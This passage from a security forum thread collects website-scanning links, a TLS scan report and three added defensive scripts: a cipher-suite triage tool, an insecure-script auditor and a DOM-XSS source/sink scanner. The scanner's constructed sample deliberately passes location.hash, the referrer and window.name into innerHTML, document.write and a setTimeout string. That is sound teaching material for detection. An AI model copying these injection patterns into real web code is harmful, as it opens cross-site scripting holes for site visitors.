TLS1.0
Protocols not enabled:
SSLv3
SSLv2
Secure Renegotiation:
 Enabled
Downgrade attack prevention:
 Enabled
Next Protocol Negotiation:
 Not Enabled
Session resumption (caching):
 Enabled
Session resumption (tickets):
 Enabled
Strict Transport Security (HSTS):
 Not Enabled
SSL/TLS compression:
 Not Enabled
Heartbeat (extension):
 Enabled
RC4:
 Not Enabled
OCSP stapling:
 Not Enabled

Vulnerabilities checked:
Heartbleed
Poodle (TLS)
Poodle (SSLv3)
FREAK
BEAST
CRIME
Cipher suites enabled:
TLS_RSA_WITH_3DES_EDE_CBC_SHA (0x000A)
TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA (0x0016)
TLS_RSA_WITH_AES_128_CBC_SHA (0x002F)
TLS_DHE_RSA_WITH_AES_128_CBC_SHA (0x0033)
TLS_RSA_WITH_AES_256_CBC_SHA (0x0035)
TLS_DHE_RSA_WITH_AES_256_CBC_SHA (0x0039)
TLS_RSA_WITH_AES_128_CBC_SHA256 (0x003C)
TLS_RSA_WITH_AES_256_CBC_SHA256 (0x003D)
TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 (0x0067)
TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 (0x006B)
TLS_RSA_WITH_AES_128_GCM_SHA256 (0x009C)
TLS_RSA_WITH_AES_256_GCM_SHA384 (0x009D)
TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 (0x009E)
TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 (0x009F)
TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA (0xC012)
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (0xC013)
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (0xC014)
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 (0xC027)
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 (0xC028)
TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (0xC02F)
TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (0xC030)

11 issues here: https://mxtoolbox.com/domain/guru.cr/

F-grade status and recommendation and further scans: https://observatory.mozilla.org/analyze.html?host=guru.cr

Flagged: http://urlquery.net/report/80affa33-f2af-40e6-b824-6888dd8fb762

Also consider: https://urlscan.io/domain/guru.cr  -> -> https://urlscan.io/result/32d9da5e-c460-4f4e-8857-0f10341263f2/#summary

polonus (volunteer website security analyst and website error-hunter)
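The cipher-suite list in the report above, and the ROBOT post earlier in the thread with its advice to disable TLS RSA key exchange where possible, are both about reading a scanner's raw output for the weaknesses that matter. As an added example (not code from the Symantec checker, Mozilla Observatory, testssl.sh or any other tool named here), the following script parses a pasted suite list and the server feature flags and turns them into findings: static RSA key exchange (the suite class ROBOT tests, with no forward secrecy), 3DES, CBC under TLS 1.0, missing HSTS and OCSP stapling, and an enabled Heartbeat extension. The suite list is the one printed for guru.cr; the feature dictionary is constructed from the same report.

```python
import re

# IANA suite name: TLS_<key exchange>_WITH_<bulk cipher>_<MAC/PRF>
SUITE_RE = re.compile(
    r"^TLS_(?P<kx>[A-Z_]+?)_WITH_(?P<cipher>[A-Z0-9_]+?)_(?P<mac>SHA256|SHA384|SHA|MD5)$")
AEAD_MARKERS = ("GCM", "CCM", "CHACHA20")


def extract_suite_names(scan_text):
    """Pull suite names out of pasted scanner output, dropping '(0x..)' code suffixes."""
    names = []
    for line in scan_text.splitlines():
        line = re.sub(r"\s*\(0x[0-9A-Fa-f]+\)\s*$", "", line.strip())
        if line.startswith("TLS_"):
            names.append(line)
    return names


def parse_suite(name):
    """Split an IANA suite name into key exchange, bulk cipher and MAC/PRF parts."""
    m = SUITE_RE.match(name)
    if not m:
        raise ValueError("unrecognised cipher suite name: %s" % name)
    return m.groupdict()


def classify_suites(scan_text):
    """Bucket every suite by the property that decides the verdict."""
    b = {"rsa_key_exchange": [], "forward_secrecy": [], "three_des": [],
         "cbc": [], "rc4": [], "aead": []}
    for name in extract_suite_names(scan_text):
        p = parse_suite(name)
        if p["kx"] == "RSA":                        # static RSA key transport
            b["rsa_key_exchange"].append(name)
        elif p["kx"].startswith(("ECDHE", "DHE")):  # ephemeral (EC)DH: forward secrecy
            b["forward_secrecy"].append(name)
        if "3DES" in p["cipher"]:
            b["three_des"].append(name)
        if "CBC" in p["cipher"]:
            b["cbc"].append(name)
        if "RC4" in p["cipher"]:
            b["rc4"].append(name)
        if any(marker in p["cipher"] for marker in AEAD_MARKERS):
            b["aead"].append(name)
    return b


def triage(scan_text, features):
    """Combine suite buckets with server feature flags into a list of findings."""
    b = classify_suites(scan_text)
    out = []
    if b["rsa_key_exchange"]:
        out.append("%d suites use static RSA key exchange: no forward secrecy and the class "
                   "ROBOT tests; drop them unless the stack is confirmed patched" % len(b["rsa_key_exchange"]))
    if b["three_des"]:
        out.append("%d 3DES suites: 64-bit block cipher (Sweet32)" % len(b["three_des"]))
    if b["rc4"]:
        out.append("RC4 suites enabled")
    if "TLS1.0" in features.get("protocols", []) and b["cbc"]:
        out.append("TLS 1.0 with %d CBC suites: BEAST/Lucky13-class exposure" % len(b["cbc"]))
    if not b["aead"]:
        out.append("no AEAD (GCM/CCM/ChaCha20) suite offered")
    if not features.get("hsts", False):
        out.append("HSTS not enabled")
    if not features.get("ocsp_stapling", False):
        out.append("OCSP stapling not enabled")
    if features.get("heartbeat", False):
        out.append("Heartbeat extension enabled: only DTLS needs it; disable to shrink the surface")
    return out


# Suite list copied from the guru.cr report above; feature flags constructed from it.
GURU_CR_SUITES = """
TLS_RSA_WITH_3DES_EDE_CBC_SHA (0x000A)
TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA (0x0016)
TLS_RSA_WITH_AES_128_CBC_SHA (0x002F)
TLS_DHE_RSA_WITH_AES_128_CBC_SHA (0x0033)
TLS_RSA_WITH_AES_256_CBC_SHA (0x0035)
TLS_DHE_RSA_WITH_AES_256_CBC_SHA (0x0039)
TLS_RSA_WITH_AES_128_CBC_SHA256 (0x003C)
TLS_RSA_WITH_AES_256_CBC_SHA256 (0x003D)
TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 (0x0067)
TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 (0x006B)
TLS_RSA_WITH_AES_128_GCM_SHA256 (0x009C)
TLS_RSA_WITH_AES_256_GCM_SHA384 (0x009D)
TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 (0x009E)
TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 (0x009F)
TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA (0xC012)
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (0xC013)
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (0xC014)
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 (0xC027)
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 (0xC028)
TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (0xC02F)
TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (0xC030)
"""
GURU_CR_FEATURES = {"protocols": ["TLS1.2", "TLS1.1", "TLS1.0"], "hsts": False,
                    "ocsp_stapling": False, "heartbeat": True}

if __name__ == "__main__":
    for finding in triage(GURU_CR_SUITES, GURU_CR_FEATURES):
        print("-", finding)
```

Offering a static RSA suite is not by itself a ROBOT vulnerability; the attack needs a padding-oracle bug in the server's RSA decryption, which is what the robotattack.org and testssl.sh checks probe. Removing the `TLS_RSA_*` suites is nonetheless the durable fix, because it takes the oracle out of reach and gives every client forward secrecy at the same time.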
Title: Re: Tests and other Media topics
Post by: RejZoR on January 12, 2018, 09:31:58 AM
Thx for the headsup Polonus! That's a bit stupid on the Ashampoo's side...
Title: Re: Tests and other Media topics
Post by: RejZoR on January 12, 2018, 10:02:45 AM
Another way could be to set it to

Quote
MachinePolicy        Undefined
UserPolicy             Undefined
Process                 Undefined
CurrentUser          Undefined
LocalMachine        Undefined

pol

How do you set it to "Undefined"? Using "Default" sets it to "Restricted"...
Title: Re: Tests and other Media topics
Post by: DavidR on January 12, 2018, 11:16:00 AM
Another way could be to set it to

Quote
MachinePolicy        Undefined
UserPolicy             Undefined
Process                 Undefined
CurrentUser          Undefined
LocalMachine        Undefined

pol

How do you set it to "Undefined"? Using "Default" sets it to "Restricted"...

If you check bob3160's earlier post, it has some images and there is a link in one of the images that may help. 
https://forum.avast.com/index.php?topic=129271.msg1441045#msg1441045

I don't know if you have tried the ? after the command to see if it gives much help.
Title: Re: Tests and other Media topics
Post by: polonus on January 12, 2018, 03:10:57 PM
Hi DavidR,

A better way to check is: https://www.howtogeek.com/338801/how-to-check-if-your-pc-is-protected-against-meltdown-and-spectre/

undefined in this sense equals restricted - from this article
Quote
https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-5.1
names under "Windows PowerShell Execution Policies", "Undefined",
If the execution policy in all scopes is Undefined, the effective execution policy is Restricted, which is the default execution policy.

So I am fine, on AMD I am also not vulnerable to meltdown where Intel users are  ;) ;D

polonus
Title: Re: Tests and other Media topics
Post by: DavidR on January 12, 2018, 05:28:59 PM
Hi DavidR,

A better way to check is: https://www.howtogeek.com/338801/how-to-check-if-your-pc-is-protected-against-meltdown-and-spectre/

undefined in this sense equals restricted - from this article
Quote
https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-5.1
names under "Windows PowerShell Execution Policies", "Undefined",
If the execution policy in all scopes is Undefined, the effective execution policy is Restricted, which is the default execution policy.

So I am fine, on AMD I am also not vulnerable to meltdown where Intel users are  ;) ;D

polonus

My post was a direct response to RejZoR, he may well find this useful.

I'm on an old Core2Duo and as far as I can tell that too isn't vulnerable. 

The only thing you are vulnerable to is MS screwing up your system with a windows update for AMD chips, but they have now pulled windows updates for AMD chips.
Title: Re: Tests and other Media topics
Post by: polonus on February 05, 2018, 01:03:39 PM
Full list of Symantec certificates that will become untrusted:
https://raw.githubusercontent.com/arkadiyt/symantec-certificate-checker/master/bad_hosts.txt

Read: https://arkadiyt.com/2018/02/04/quantifying-untrusted-symantec-certificates/

Checked with Symantec's: https://observatory.mozilla.org/analyze.html?host=easyredmine.com#tls
Quote
SSL certificate is not installed. Click here to get a certificate.

Many systems are configured with firewalls that block SSH access. To successfully scan with the SSH Observatory,
access must be granted to Mozilla's scanning system.
But a A- status here? -> https://www.ssllabs.com/ssltest/analyze?d=easyredmine.com
DNS CAA No - Chain issues - 5 DNS issues -> https://mxtoolbox.com/domain/www.easyredmine.com/

Also consider info here: https://toolbar.netcraft.com/site_report?url=%09https%3A%2F%2Fwww.easyredmine.com

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on February 09, 2018, 12:11:31 AM
From June 2018 onwards the Google Chrome browser will start to label all http websites as insecure,
this in order to come to a https-only Internet, which will also better protect connections for their core business
and all data that they will be sending to their chocolate factory (including your private data) via non-public CDN,
so who will check their tracking and profiling, and to whom do they stand responsible?

To better be able to check your https website functionality and code use:
https://developers.google.com/web/tools/chrome-devtools/#open

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 11, 2018, 06:17:46 PM
Checking backupspider.com.html on Zonemaster creates critical errors, this scan however is fine:
https://zonemaster.iis.se/?resultid=a9edfa238f0b5f9b

Results supported by these results: https://intodns.com/backupspider.com

3 issues here: https://mxtoolbox.com/domain/backupspider.com/

Risk rating 1 red out of 10: https://toolbar.netcraft.com/site_report?url=backupspider.com

polonus (volunteer website security analyst & website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on February 20, 2018, 08:31:30 PM
One knows polonus checks for retirable jQuery libraries, including node.js, using the online retire.js scanner.
There is also a way to check node.js for insecurity: snyk open source.
One can do a test for azure (azure@2.2.1-preview) and test e.g. "tunnel agent" in for instance Brave browser on android and we will get 9 issues, "do not use callbacks" for one.
Install -> npm install -g snyk
cd ~/projects/myproj/
snyk test

Enjoy,
polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 24, 2018, 11:15:28 PM
Hi security minded friends,

Polonus was away for the week to central Poland, temp now minus 8 Celsius.

While not much online here last week on these here forums,
polonus is as always continuously on the look-out for script-security improvement of any sort.

I and a younger IT friend of mine stumbled onto this super script from the renowned resource engineer
& open source security researcher, zx2c4, from Paris, France.

His is the innovative secure.js script. To enjoy this script, go to this link,
and see this javascript to prevent HTTPS leaks:  https://git.zx2c4.com/secure.js/tree/secure.js

As we find in his to do list inside the code there is still some work to be done on detecting async scripts,
and through going over StackOverflow's solutions,  and thnx to Cookie_Monster there, we stumbled upon:

Code: [Select]
// 1. enumerate the scripts already in the document
document.querySelectorAll('script');

// 2. async script tag with an onload callback
<script async src="jquery.js" onload="jqueryloaded()"></script>

// 3. the same thing done from JavaScript
var script = document.createElement("script");
script.src = "jquery.js";
script.onload = jqueryloaded;
document.body.appendChild(script);

// 4. with head.js
head.load("jQuery.js", function () {
    console.log("jQuery loaded");
});


Could there be a possibility secure.js could be adopted & enhanced in such a way?
Still waiting from a response from Jason Donenfeld (aka zx2c4) accordingly,

polonus (volunteer website security analyst and website error-hunter)
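Picking up the async-script detection question, here is an added example that is neither polonus's snippet nor zx2c4's secure.js: it enumerates the scripts a page pulled in, including async and later-appended ones, and flags any that would fetch over plain http on an https page. The MutationObserver part only runs in a browser; the classifier runs anywhere, and all names are this example's own.

```javascript
// Added example: enumerate <script> elements on an HTTPS page, including async and
// dynamically appended ones, and report any that would leak to plain HTTP.
// Not part of secure.js; the function names below are this example's own.

// Classify one script src against the page protocol. Returns null when the
// script is inline or would be fetched securely, otherwise a short reason.
function classifyScriptSrc(pageProtocol, src) {
  if (!src) return null;                       // inline script, nothing to fetch
  const trimmed = src.trim();
  if (/^https:/i.test(trimmed)) return null;   // already secure
  if (/^http:/i.test(trimmed)) return "insecure-http";
  if (/^\/\//.test(trimmed)) {                 // protocol-relative inherits the page protocol
    return pageProtocol === "https:" ? null : "protocol-relative";
  }
  if (/^[a-z][a-z0-9+.-]*:/i.test(trimmed)) return "other-scheme"; // data:, blob:, ...
  return null;                                 // relative URL, same protocol as the page
}

// Summarise a list of {src, async, dynamic} records as findings.
function auditScripts(pageProtocol, scripts) {
  const findings = [];
  for (const s of scripts) {
    const reason = classifyScriptSrc(pageProtocol, s.src);
    if (reason) findings.push({ src: s.src, reason, async: !!s.async, dynamic: !!s.dynamic });
  }
  return findings;
}

// Browser wiring: snapshot the scripts present now, then watch for scripts
// inserted later (the async / dynamic case the secure.js to-do list mentions).
// Scripts whose src is set only after insertion are not caught by this watcher.
function watchScripts(onFinding) {
  if (typeof document === "undefined") return null;   // not running in a browser
  const proto = window.location.protocol;
  const seen = new Set();
  const record = (el, dynamic) => {
    if (seen.has(el)) return;
    seen.add(el);
    const src = el.getAttribute("src");
    const reason = classifyScriptSrc(proto, src);
    if (reason) onFinding({ src, reason, async: el.async, dynamic });
  };
  document.querySelectorAll("script").forEach((el) => record(el, false));
  const observer = new MutationObserver((mutations) => {
    for (const m of mutations) {
      for (const node of m.addedNodes) {
        if (node.nodeName === "SCRIPT") record(node, true);
      }
    }
  });
  observer.observe(document.documentElement, { childList: true, subtree: true });
  return observer;
}

// Constructed sample standing in for what querySelectorAll and the observer would see.
const SAMPLE_SCRIPTS = [
  { src: "https://cdn.example/jquery.js", async: true },
  { src: "http://cdn.example/analytics.js", async: true },
  { src: "//cdn.example/widget.js", async: false, dynamic: true },
  { src: null },
];
```

In a browser, `watchScripts(console.warn)` reports each offending script as it appears; in Node only the classifier and `auditScripts` run.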

Title: Re: Tests and other Media topics
Post by: polonus on February 27, 2018, 05:43:09 PM

Get a universally unique identifier to protect your geekie code
from here: http://onlineuuidgenerator.com/  (also time-based version).

Unique identifiers can protect you and also can give you away when you violate online laws.

Think of Verizon's Precision ID (re: http://www2.ca3.uscourts.gov/opinarch/163588p.pdf )
and re: https://readwrite.com/2015/01/31/verizon-tracking-perma-cookies-supercookies-uidh-precisionid-opt-out/
also perma-cookies while on tor and afterwards can identify you.

Tor will not anonymize you, in combination with tails also not fully anonymize ye; recorded is the size of your browser window open for instance, and other unique identifiers like typing habits/speed/anomalies, websites visited etc.

Using tails in combination with a VM is a bad idea, it can unveil your OS identification. Using Tor and tails and a vpn a la default is always a bad idea for hackers and cybercriminals alike. You get caught, period.

Also be aware of correlation attacks, targeted malware injection, and time-based attacks. Also never share privacy related data online or break your online habits. These mistakes have caused many a perpetrator quite some jail time.
So better do not do the crime, if you cannot do the time.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on March 05, 2018, 06:03:30 PM
A fine AI-driven PHISHing-IP checker:
(example IP): https://checkphish.ai/ip/94.23.220.38

Enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 05, 2018, 06:25:58 PM
An example of what we can detect starting to use this service:
https://checkphish.ai/ip/94.23.220.38  and then checked: https://checkphish.ai/domain/poufmarocain.com
and then https://aw-snap.info/file-viewer/?protocol=not-secure&tgt=poufmarocain.com&ref_sel=GSP2&ua_sel=ff&fs=1
and also two detections here: https://retire.insecurity.today/#!/scan/8daed221f8bde319f1f93ab73c4d2578663ae7ee4fdd039823c1c35b578c47bf
moreover this:
Quote
poufmarocain.com/js/jquery/jquery-migrate-1.2.1.min.js benign
     info: [decodingLevel=0] found JavaScript
     error: undefined variable jQuery
     error: undefined function e
Also http://www.domxssscanner.com/scan?url=https%3A%2F%2Fpoufmarocain.com%2F
leading us here: https://aw-snap.info/file-viewer/?protocol=not-secure&tgt=www.comservice-online.de%2Findex.php%3Fmod%3Dusers%26action%3Dview%26id%3D121198%2F&ref_sel=GSP2&ua_sel=ff&fs=1

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on March 06, 2018, 01:52:36 PM
To keep everything tested and secure: http://seclist.us/category/security-tools

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 16, 2018, 02:15:55 PM
Are you out on a spoofable AS?
Test and help fight against InfoSpoofing:

https://www.infospoofing.com/

polonus

Info credits also: https://www.caida.org/projects/spoofer/
Title: Re: Tests and other Media topics
Post by: polonus on March 17, 2018, 01:25:13 PM
Important as an anti-spoof protection for sub-domains etc is to have a dmarc record,

Read background info: https://fraudwatchinternational.com/expert-explanations/dmarc-protecting-domains/

test here (free trial 14 days): https://dmarcian.com/dmarc-inspector/rug.nl
Or check here: https://mxtoolbox.com/dmarc.aspx

Free check tool: https://www.dmarcanalyzer.com/dmarc/dmarc-record-check/

Example - -https://app.dmarcanalyzer.com/dns/dmarc_validator?domain=yahoo.com&g-recaptcha-response=03ANcjospioYln4U73s09y5mmYq3HTT0IWNbAdz78uQ0oIrCBEQ2WO1BHfSQIpFpdHxyVPGyKpgSu1o32MqXIsZ4oqWbW_bcRGuKmcB_UFpvR4IDgCKaadO87tU42mQhzFKqGKQBcP3dy4VEUDC-HXLUDvN23gnyP5twFdOJbZ9I41IrorzPm38kI4_wJlWXE9_3pwTwy9qLM8x1eg-P8RBrSb_jyYgvhB-Y0RNB1_dio1RWg39d-HUpS7VGyAcewNwVvUXQ-RuzlYSF0cRLJvwBEv6ED2J1dKlozAWbRNXqx5G6fvY-vj8SMe9g8DeMjxA914b0gQ5D5S&_token=d6VBx3OrOvqoZE8tUwj5AAh7Id6u7tlneivRvAIH

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on March 30, 2018, 08:45:30 PM
Proxies and VPN's may leak your IP-address through WebRTC.
This can be done via so-called stun-server logs.


Read about it here: https://voidsec.com/vpn-leak/
Protect against it with this extension: https://chrome.google.com/webstore/detail/webrtc-network-limiter/npeicpdbkakmehahjeeohfdhnlpdklia

Check your vulnerability: http://ip.voidsec.com/

Quote
How to disable WebRTC in Firefox?

In short: Set "media.peerconnection.enabled" to "false" in "about:config".

Explained:

Enter "about:config" in the firefox address bar and press enter.
Press the button "I'll be careful, I promise!"
Search for "media.peerconnection.enabled"
Double click the entry, the column "Value" should now be "false"
Done. Do the WebRTC leak test again.

If you want to make sure every single WebRTC related setting is really disabled change these settings:

media.peerconnection.turn.disable = true
media.peerconnection.use_document_iceservers = false
media.peerconnection.video.enabled = false
media.peerconnection.identity.timeout = 1

Now you can be 100% sure WebRTC is disabled.
Quote source: https://www.privacytools.io/#webrtc

You will be astounded when you check here: https://www.dnsleaktest.com/
and for further tests: https://www.grc.com/dns/dns.htm

No more leaks via an IPVanish with this extension:
https://addons.mozilla.org/nl/firefox/addon/happy-bonobo-disable-webrtc/

In privacy badger you can set prevent WebRTC to leak the internal IP address.
This could cause some slowness on Google Hangout.

Palemoon browser blocks this leaking as per default.

Info credits go to posters here: -https://www.security.nl/posting/555923

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on April 05, 2018, 03:07:00 PM
In the light of re-appearing security issues with websites running the PHP-driven WordPress CMS
(CMS short for Content Management Software).

Start to scan for a really quick and dirty here: http://hackertarget.com/wordpress-security-scan/

Also at: https://sitecheck.sucuri.net/
and https://www.quttera.com scans.

Furthermore for retirable jQuery libraries scan here: https://retire.insecurity.today/#

Also: https://observatory.mozilla.org/?
Together with a scan here: https://cryptoreport.websecurity.symantec.com/checker/en
Furthermore scan at: http://www.domxssscanner.com/

All scans are just meant for obtaining benevolent research info.
Never use any info so gained against a certain AS, domain, IP range or IP etc.

For a json and api info scan: https://urlscan.io/domain

More scan suggestions via : https://geekflare.com/online-scan-website-security-vulnerabilities/

Interesting results may also be obtained via a scan here:
https://www.eff.org/https-everywhere/atlas/

Also via http://rips-scanner.sourceforge.net/ 
and
https://app.upguard.com/webscan#/

Enjoy my friends, enjoy.  Info credits luntrus (@security dot nl)

With questions or issues come to the virus and worms section of these avast forums,

polonus (volunteer website security analyst and website error hunter)
Title: Re: Tests and other Media topics
Post by: bob3160 on April 05, 2018, 04:06:09 PM
Thank You. :)
(https://screencast-o-matic.com/screenshots/u/Lh/1522937124978-50695.png)
Title: Re: Tests and other Media topics
Post by: polonus on April 07, 2018, 02:49:18 PM
This is a POC - DO NOT use it for a production environment. Info credits go to lhecker at Github today

Checking this POC code against facebook's proxygen-bolt -> https://github.com/lhecker/libnodecc
Do not use libnodecc in a developer's production environment, just for research experiments only.
See: https://urlscan.io/result/3b26405e-cc14-49fb-ba92-e2e2f8be0368/jsonview/
and https://urlquery.net/report/c85aceb0-5456-4363-ad7f-b9bb3e960636
proxygen-bolt unrecognized despite returning data
There always should be room for PHP (in)security testing: Security Checks for -static.xx.fbcdn.net
Verdict of insecurity:
(2) Susceptible to man-in-the-middle attacks
HSTS header does not contain includeSubDomains
HSTS header not prepared for preload list inclusion
Vulnerable to cross-site attacks
HttpOnly cookies not used

error to go onto
Quote
-static.xx.fbcdn.net/rsrc.php/v3iCvN4/yt/l/DE/iNEySX6agJT.js benign
     info: [decodingLevel=0] found JavaScript
     error: undefined variable __d
     error: undefined function __d
nested undefined variable error, when you try to grab, but you do not see what is run...(pol).

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on April 10, 2018, 04:49:27 PM
Babel, a strict VM driven javascript compiler on the client (browser) to tight-test javascript security!

What we tested? Well javascript taken from this scan: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fyandex.ru

Tested against babel here: https://babeljs.io/repl#?babili=false&browsers=&build=&builtIns=false&code_lz=BQMwrgdgxgLglgewsA5gGgBZoDIEoDe408SABAG7ACGaARmlAQE4CmMYTEpRsiyBMJgE98rdp1JUAdFQAOsgDZDgMDHA

Do not think out of the box, think strict and exact. Go to the next phase with Rust and Babel.

Another check of this code: -mc.yandex.ru/metrika/watch.js benign
DOM-XSS vuln.
Number of sources found: 77
Number of sinks found: 14

For instance
Quote
repl: Unexpected token, expected ; (1:17)
> 1 | ["\x3c/form\x3e"]);h.innerHTML=k.join("")
    |                  ^ 

Enjoy, my research developer friends, enjoy,

Example
Quote
// babel-code-frame
import codeFrame from 'babel-code-frame';

const rawLines = `class Foo {
  constructor()
}`;
const lineNumber = 2;
const colNumber = 16;

const result = codeFrame(rawLines, lineNumber, colNumber, { /* options */ });

console.log(result);

// js-tokens
var jsTokens = require("js-tokens").default

var jsString = "var foo=opts.foo;\n..."

jsString.match(jsTokens)
// ["var", " ", "foo", "=", "opts", ".", "foo", ";", "\n", ...]
import {matchToToken} from "js-tokens"
// or:
var g = 9.82
var number = bar / 2/g


polonus
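The sources/sinks counts quoted above come from a regex-based static scan; as an added example (not domxssscanner's rules and not polonus's code), here is a small scanner of the same shape, run over a constructed snippet modelled on the `h.innerHTML=k.join("")` fragment. The rule lists are deliberately short and are this example's own.

```javascript
// Added example (not domxssscanner's rules nor the author's code): a minimal
// regex-based DOM-XSS source/sink finder of the same shape as the online scanners
// quoted in this thread. The rule lists are this example's own.
const DOM_XSS_SOURCES = [
  /\blocation\s*\.\s*(?:href|hash|search|pathname)\b/g,     // URL-controlled
  /\bdocument\s*\.\s*(?:URL|documentURI|referrer|cookie)\b/g,
  /\bwindow\s*\.\s*name\b/g,                                // set by an opener or frame
  /\blocalStorage\s*\.\s*getItem\s*\(/g,
];
const DOM_XSS_SINKS = [
  /\.\s*innerHTML\s*=(?!=)/g,                               // assignment, not comparison
  /\.\s*outerHTML\s*=(?!=)/g,
  /\bdocument\s*\.\s*write(?:ln)?\s*\(/g,
  /\beval\s*\(/g,
  /\bsetTimeout\s*\(\s*["'`]/g,                             // string argument: implicit eval
  /\.\s*insertAdjacentHTML\s*\(/g,
];

// Run every pattern over the code; return hits ordered by position, with the
// 1-based line number so a finding can be located in the file.
function findMatches(code, patterns) {
  const hits = [];
  for (const re of patterns) {
    re.lastIndex = 0;                  // global regexes keep state between calls
    let m;
    while ((m = re.exec(code)) !== null) {
      hits.push({
        text: m[0],
        index: m.index,
        line: code.slice(0, m.index).split("\n").length,
      });
    }
  }
  return hits.sort((a, b) => a.index - b.index);
}

function scanDomXss(code) {
  const sources = findMatches(code, DOM_XSS_SOURCES);
  const sinks = findMatches(code, DOM_XSS_SINKS);
  // Lines where a source and a sink meet deserve the first manual look.
  // This is a heuristic, not taint tracking: a count says nothing about reachability.
  const sinkLines = new Set(sinks.map((s) => s.line));
  const suspectLines = [...new Set(sources.filter((s) => sinkLines.has(s.line)).map((s) => s.line))];
  return { numSources: sources.length, numSinks: sinks.length, sources, sinks, suspectLines };
}

// Constructed sample modelled on the minified fragment quoted above
// (h.innerHTML=k.join("")); it is not the real watch.js.
const SAMPLE_JS = [
  'var k=[];k.push("<form>",location.hash.slice(1),"\\x3c/form\\x3e");',
  'h.innerHTML=k.join("");',
  'var q=document.referrer;document.write("<img src=\\""+q+"\\">");',
  'setTimeout("track("+window.name+")",100);',
].join("\n");
```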
Title: Re: Tests and other Media topics
Post by: polonus on May 03, 2018, 04:35:06 PM
Checking the privacy status of a certain website to a certain degree (cookies, advice, privacy, mozilla recommendations):

Re: https://webcookies.org/scan/15218489
Re: https://www.scamadviser.com/check-website/borneonews.co.id
Re: https://observatory.mozilla.org/analyze/www.borneonews.co.id
Re: https://privacyscore.org/site/96307/
Quote
This website is secured
100% of the trackers on this site are helping protect you from NSA snooping. Why not thank borneonews.co.id for being secure?

 All trackers
At least 7 third parties know you are on this webpage.

 -Google
 -www.borneonews.co.id
 -Facebook
 -Google
-www.google-analytics.com Google
 -api.borneonews.co.id
 -Google

 Info Tracker SSL extension report for wXw.borneonews.co.id

Also consider (1 red out of 10 netcraft risk given):
https://toolbar.netcraft.com/site_report?url=https%3A%2F%2Fwww.borneonews.co.id%2F

and insecurity reported here: https://app.upguard.com/webscan#/borneonews.co.id

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on May 06, 2018, 03:07:39 PM
L.S.

DNS Record Viewer and another fine collection of handy dandy tools here:

http://dns-record-viewer.online-domain-tools.com/

Good to be used in combination with my Shodan extension in the browser - example:
https://www.shodan.io/host/52.2.58.67  -> http://ec2-52-2-58-67.compute-1.amazonaws.com/
PTR - pdns1.ultradns.net  x4.amazonaws.org  x2.amazonaws.com  x1.amazonaws.com  x3.amazonaws.org

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on May 07, 2018, 11:42:47 PM
For WordPress website admins and maintenance:

Looking for retirable jQuery libraries: https://retire.insecurity.today/#

Scan for WordPress issues (a quick and dirty scan) at https://hackertarget.com/wordpress-security-scan/

For developers in the audience:
Quote
With WordPress plug-ins there is a possibility to get errors with a certain plug-in that overwrites,
Press F 12 and inspect in the browser console what file causes this.
First thing to do now is to de-activate the plug-in, and a second solution is to remove the code,
but in that case you have to know your javascript a bit.


Quote info credits and thanks for the instruction go out to Jasminder Pal Singh,
who instructed this method to me via an online video.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on May 10, 2018, 12:35:42 AM
Going over an error after a PTR request for 165.38.101.151.in-addr.arpa , it said I got a name error.

After reading on how to setup Reverse DNS & PTR records, I stumbled on this nice online interface website:

https://www.digwebinterface.com/?hostnames=165.38.101.151.in-addr.arpa&type=Reverse&ns=resolver&useresolver=8.8.4.4&nameservers=

Not much to go by here: https://toolbar.netcraft.com/site_report?url=165.38.101.151.in-addr.arpa

Above link for IT specialists and researchers only.

We also checked it here and found out why it failed: DNSsy Report Results
Results for 165.38.101.151.in-addr.arpa

Test | Results | Status
Checking domain format: | Hostname looks good. | Pass
Checking for parent nameservers: | Found 6 parent nameservers. | Pass
Checking for parent glue: | Found glue from root nameservers to parent nameservers. | Info
NS records at parent nameserver: | Your NS records at your parent nameserver are: Provided by e.in-addr-servers.arpa -> pri.authdns.ripe.net | Info
Nameservers listed at parent: | No nameservers found at parent nameserver. | Fail

